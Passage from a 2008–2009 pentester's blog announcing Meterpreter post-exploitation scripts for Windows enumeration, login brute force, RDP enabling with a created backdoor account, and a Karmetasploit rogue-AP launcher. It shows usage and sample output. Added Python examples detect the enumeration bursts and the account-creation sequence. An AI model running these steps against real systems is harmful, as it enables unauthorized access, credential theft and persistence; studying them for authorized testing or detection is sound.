Entries in Metasploit (21)

Thursday, January 8, 2009

Meterpreter Post-Exploitation Scripts

Today the Metasploit post-exploitation scripts I wrote were approved and committed into Metasploit 3. They perform enumeration and attacks from the compromised machine using Windows native tools for both tasks. The scripts are:

  • Winenum - general Windows enumeration script for gathering all kinds of information from a Windows host, adapting the commands run and the information gathered to the version of Windows it is run on.
  • Netenum - network enumeration script for performing basic network enumeration of the target environment. It will perform ping sweeps, hostname brute force, reverse lookups on ranges and general DNS record enumeration.
  • Winbf - it will perform login brute-force attacks against Windows logins using dictionaries against a single login or a list of usernames. It will also enumerate the current Windows account lockout and password length policy so the user will be able to better tailor the attack.
  • Getgui - script for enabling RDP and for creating an account and adding it to the appropriate groups to be able to get Remote Desktop on the target machine.
I hope they are as useful as the original ones have been for me in client engagements where I was limited by the rules of engagement dictated by some of my clients. Glad to give back to such a good project.

Saturday, January 3, 2009

Meterpreter Script for Basic Network Enumeration in Target's Network

Here is a script for basic network enumeration using Windows native tools on the target machine. The script is multi-threaded for performance and will perform the following:

* Ping Sweep
* DNS Reverse lookup on IP range
* Forward lookup brute force using a list of hostnames
* Get NS and MX records for a given domain

You can download the script from http://www.darkoperator.com/netenum.tar.gz
Let me know if you like it; any recommendations are welcome.

Here is some sample output:

Code:
meterpreter > run netenum
Network Enumerator Meterpreter Script by Darkoperator
Carlos Perez carlos_perez@darkoperator.com

Usage:

OPTIONS:

-d Domain Name for DNS Fordward Lookup
-fl To Perform DNS Fordward Lookup on host list and domain
-h Help menu.
-hl File with Host List for DNS Fordward Lookup
-ps To Perform Ping Sweeo on IP Range
-r The target address range or CIDR identifier
-rl To Perform DNS Reverse Lookup on IP Range
-st To Perform DNS lookup of MX, NS and SOA records for a domain

meterpreter > run netenum -fl -hl /home/carlos/hostlist.txt -d google.com
[*] Network Enumerator Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Performing DNS Fordward Lookup for hosts in /home/carlos/hostlist.txt for domain google.com
[*] Name:cg-in-f100.google.com 209.85.171.100
[*] Name:cg-in-f102.google.com 209.85.171.102
[*] Name:googlemail.l.google.com 209.85.133.83,209.85.133.18,209.85.133.19
[*] Name:cg-in-f101.google.com 209.85.171.101

meterpreter > run netenum -rl -r 209.85.171.100-209.85.171.110
[*] Network Enumerator Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Performing DNS Reverse Lookup for IP range 209.85.171.100-209.85.171.110
[*] 209.85.171.100 is cg-in-f100.google.com
[*] 209.85.171.101 is cg-in-f101.google.com
[*] 209.85.171.102 is cg-in-f102.google.com
[*] 209.85.171.103 is cg-in-f103.google.com
[*] 209.85.171.104 is cg-in-f104.google.com
[*] 209.85.171.108 is cg-in-f108.google.com

meterpreter > run netenum -st -d google.com
[*] Getting MX and NS Records for Domain google.com
[*] Non-authoritative answer:
[*]
[*] google.com MX preference = 10, mail exchanger = smtp4.google.com
[*] google.com MX preference = 10, mail exchanger = smtp1.google.com
[*] google.com MX preference = 10, mail exchanger = smtp2.google.com
[*] google.com MX preference = 10, mail exchanger = smtp3.google.com
[*]
[*] google.com nameserver = ns3.google.com
[*] google.com nameserver = ns4.google.com
[*] google.com nameserver = ns1.google.com
[*] google.com nameserver = ns2.google.com
[*] smtp1.google.com internet address = 209.85.237.25
[*] smtp2.google.com internet address = 64.233.165.25
[*] smtp3.google.com internet address = 64.233.183.25
[*] smtp4.google.com internet address = 72.14.221.25
[*] ns1.google.com internet address = 216.239.32.10
[*] ns2.google.com internet address = 216.239.34.10
[*] ns3.google.com internet address = 216.239.36.10
[*] ns4.google.com internet address = 216.239.38.10

meterpreter > run netenum -ps -r 209.85.171.100-209.85.171.110
[*] Network Enumerator Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Performing ping sweep for IP range 209.85.171.100-209.85.171.110
[*] 209.85.171.100 host found
[*] 209.85.171.101 host found
[*] 209.85.171.102 host found
[*] 209.85.171.103 host found
[*] 209.85.171.104 host found
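Netenum drives the target's own ping and nslookup for the sweep and lookups shown above, so a burst of those child processes under one parent process is the observable a defender can key on. Here is an added detection example in Python (not code from the original post or the script) that runs a sliding-window count over constructed process-creation records; the field names, host name and parent PID are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def constructed_events():
    """Constructed process-creation records (field names are assumptions):
    a ping sweep and reverse lookups of an 11-address range from one parent,
    plus a single unrelated ping from another parent."""
    evs = []
    base = datetime(2009, 1, 3, 9, 0, 0)
    for i in range(11):  # ping sweep, one child per address
        evs.append({"ts": base + timedelta(seconds=i), "parent_pid": 1234, "host": "WS01",
                    "image": "ping.exe", "cmdline": f"ping -n 1 10.0.0.{100 + i}"})
    for i in range(11):  # reverse lookups of the same range
        evs.append({"ts": base + timedelta(seconds=20 + i), "parent_pid": 1234, "host": "WS01",
                    "image": "nslookup.exe", "cmdline": f"nslookup 10.0.0.{100 + i}"})
    evs.append({"ts": base + timedelta(minutes=5), "parent_pid": 777, "host": "WS01",
                "image": "ping.exe", "cmdline": "ping -n 1 10.0.0.1"})  # lone admin ping
    return evs

ENUM_TOOLS = {"ping.exe", "nslookup.exe"}

def detect_enum_burst(events, threshold=10, window_seconds=60):
    """Flag (host, parent_pid) pairs that spawn at least `threshold` ping/nslookup
    children within `window_seconds`. Returns one finding per offending parent."""
    per_parent = defaultdict(list)
    for ev in events:
        if ev["image"].lower() in ENUM_TOOLS:
            per_parent[(ev["host"], ev["parent_pid"])].append(ev["ts"])
    findings = []
    for (host, ppid), stamps in per_parent.items():
        stamps.sort()
        lo = 0
        for hi in range(len(stamps)):
            # shrink the window from the left until it spans <= window_seconds
            while stamps[hi] - stamps[lo] > timedelta(seconds=window_seconds):
                lo += 1
            if hi - lo + 1 >= threshold:
                findings.append({"host": host, "parent_pid": ppid,
                                 "count": hi - lo + 1, "first": stamps[lo].isoformat()})
                break  # first burst is enough to raise an alert for this parent
    return findings
```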

Friday, January 2, 2009

Winenum Update

Josh Wright from InGuardians published a great paper called Vista Wireless Power Tools on the new wireless commands in Windows Vista, along with several tools. I added the enumeration commands to Winenum, and it will now export the registry keys where the configured wireless networks of Windows XP and Windows Vista machines are stored; these files can be imported into the pentester's Windows box to gain access to the client's network, or to recover the wireless keys with other tools after importing.

Friday, January 2, 2009

Meterpreter Script for RDP Configuration on Target

For those times when you just need a GUI.
I tested the script on Windows XP, Windows 2003, Windows Vista and Windows 2008; let me know if you like it.
http://www.darkoperator.com/getgui.tar.gz
Example:

meterpreter > run getgui -u SUPPORT_3028 -p P@ssword
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminasl Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: SUPPORT_3028 with Password: P@ssword
[*] Adding User: SUPPORT_3028 to local group Remote Desktop Users
[*] You can now login with the created user

meterpreter >
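The getgui run above touches four distinct things a defender can watch for: the registry value that gates RDP, the Terminal Services start type, a new local user, and a new member of Remote Desktop Users. As an added example (not part of the original post or the script), here is a correlation rule in Python over constructed Windows Security/System event records; the event IDs are the real ones (4657 registry value modified, 7040 service start type changed, 4720 user account created, 4732 member added to a local group), while the record layout, host names and detail text are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample records modelled on the steps getgui prints above (RDP
# registry gate, service start type, new user, Remote Desktop Users membership).
# Field names and hosts are assumptions; 4657 is only logged if a SACL is set on the key.
SAMPLE_EVENTS = [
    {"ts": "2009-01-02 10:00:01", "id": 4657, "host": "WS01",
     "detail": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections -> 0"},
    {"ts": "2009-01-02 10:00:02", "id": 7040, "host": "WS01",
     "detail": "Terminal Services start type changed from disabled to auto start"},
    {"ts": "2009-01-02 10:00:03", "id": 4720, "host": "WS01",
     "detail": "user created: SUPPORT_3028"},
    {"ts": "2009-01-02 10:00:04", "id": 4732, "host": "WS01",
     "detail": "SUPPORT_3028 added to group Remote Desktop Users"},
    {"ts": "2009-01-02 14:30:00", "id": 4720, "host": "WS02",
     "detail": "user created: jdoe"},  # a lone account creation, not the pattern
]
# Each getgui step as (Windows event id, substring expected in the detail text).
GETGUI_STEPS = [(4657, "fDenyTSConnections"), (7040, "auto start"),
                (4720, "user created"), (4732, "Remote Desktop Users")]

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def detect_getgui(events, window_minutes=10, min_steps=3):
    """Return one finding per host where at least min_steps of the four getgui
    steps occur within window_minutes of each other, in any order."""
    by_host = {}
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        by_host.setdefault(ev["host"], []).append(ev)
    findings = []
    for host, evs in by_host.items():
        for i, first in enumerate(evs):
            limit = parse_ts(first["ts"]) + timedelta(minutes=window_minutes)
            seen = set()
            for ev in evs[i:]:
                if parse_ts(ev["ts"]) > limit:
                    break
                for idx, (eid, needle) in enumerate(GETGUI_STEPS):
                    if ev["id"] == eid and needle in ev["detail"]:
                        seen.add(idx)
            if len(seen) >= min_steps:
                findings.append({"host": host, "start": first["ts"], "steps": sorted(seen)})
                break  # one finding per host is enough for an alert
    return findings
```

Requiring three of the four steps keeps the rule from firing on a lone account creation while still catching a run where registry auditing is not enabled.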

Sunday, December 28, 2008

Updated Karmetasploit Attack Script

Here is the version of the script that uses the DigiNinja Karma patch for Atheros. I find it a more flexible and reliable alternative to airbase-ng, but it is limited to Atheros cards; for all other aircrack-ng supported cards the modes that use airbase-ng can be used. I also fixed the path issue with Metasploit. Hope you guys like it. Here is the link to the script with the changes:
http://www.darkoperator.com/kmsapng.tar.gz
If you changed the kernel modules of your BT3 install, you can get the patched madwifi modules with DigiNinja's karma patch and the patch from aircrack-ng here:
http://www.darkoperator.com/madwifi-r37 … g-patc.lzm
I do have to say that DigiNinja's karma patch is a must for anyone using an Atheros card and doing wireless client-side attacks.
Karmetasploit AP launcher by Carlos Perez for Backtrack3
Version 0.3
carlos_perez[at]darkoperator.com
usage: kmsap.sh

Options:
-m : Every mode is a different approach of the attack.
km for regular karmetasploit attack using airbase-ng
kmf for filtered attack where only targeted
clients can associate to the fake AP using the
filter file.
kma for karmetasploit attack using DigiNinja patched
madwifi drivers.
kmaf for karmetasploit attack using DigiNinja patched
madwifi drivers and mac address filtering.
-i : Interface supported by aircrack-ng for injection
-f : Text file with mac addresses of client computers
permited to connect to the fake AP used with kmf and
kmaf modes, on mac address per line.
-s : SSID name used as the initial broadcast
-r : Metasploit Resource Script (Optional)
-h : This help message

Note: mode and interface are required for all types of attacks and -f for filtered attacks